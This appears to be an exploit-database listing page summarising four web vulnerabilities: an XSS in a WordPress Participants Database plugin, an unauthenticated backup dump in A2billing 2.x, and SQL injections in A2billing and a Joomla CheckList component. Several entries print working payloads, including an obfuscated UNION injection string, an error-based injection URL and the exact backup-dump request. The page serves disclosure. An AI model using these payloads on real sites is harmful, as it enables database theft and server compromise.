header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

WordPress Plugin Participants Database < 1.7.5.10 - XSS

Cross site scripting (XSS) vulnerability in the Wordpress Participants Database plugin 1.7.59 allows attackers to inject arbitrary javascript via the Name parameter. The XSS vulnerability is found on the participant signup form input textfield. The get_field_value_display() function in PDb_FormElement.class.php did not escape HTML special characters, allowing an attacker to input javascript. The XSS code will be executed on 2 pages.

A2billing 2.x , Unauthenticated Backup dump / RCE flaw

A2billing 2.x is vulnerable to unauthenticated backup dump and RCE. The vulnerable code is present in the file admin/public/form_data/FG_var_backup.inc. The file is being called at "admin/Public/A2B_entity_backup.php" before the authentication checking proccess take place. By accessing the URL http://HOST//a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.sql, an attacker can dump the full backup. Few hardening is being carried out by the application which did great job prevnting the RCE but still we can bypass it by using the backup dump.

A2billing 2.x , Sql injection vulnerability

A2billing is vulnerable to sql injection attack resulting from not enough sanitization of several inputs including transactionID. Sending a POST request with transactionID=456789111111 unise//**lectonselinse//**rtect 1,2,3,4,0x706c75676e706179,6,7,8,9,10,11,12,13-//**--&sess_id=4148key=636902c6ed0db5780eb613d126e95268 to the checkout_process.php page will result in redirection of the application and the Location header will contain the decoded payment module which was used in the query, indicating successful injection.

Joomla! Component CheckList 1.1.0 – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/[PROFILE][SQL].html http://localhost/[PATH]/[TAG][SQL].html http://localhost/[PATH]/[CHECKLIST][SQL].html our-products/checklist/checklist/tag/social'and+(SeLeCT+1+FrOM+(SeLeCT+count(*),COncaT((SeLeCT(SeLeCT+COncaT(cast(database()+as+char),0x7e))+FrOM+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+FrOM+information_schema.tables+group+by+x)a)+AND+''='.html

Recent Exploits: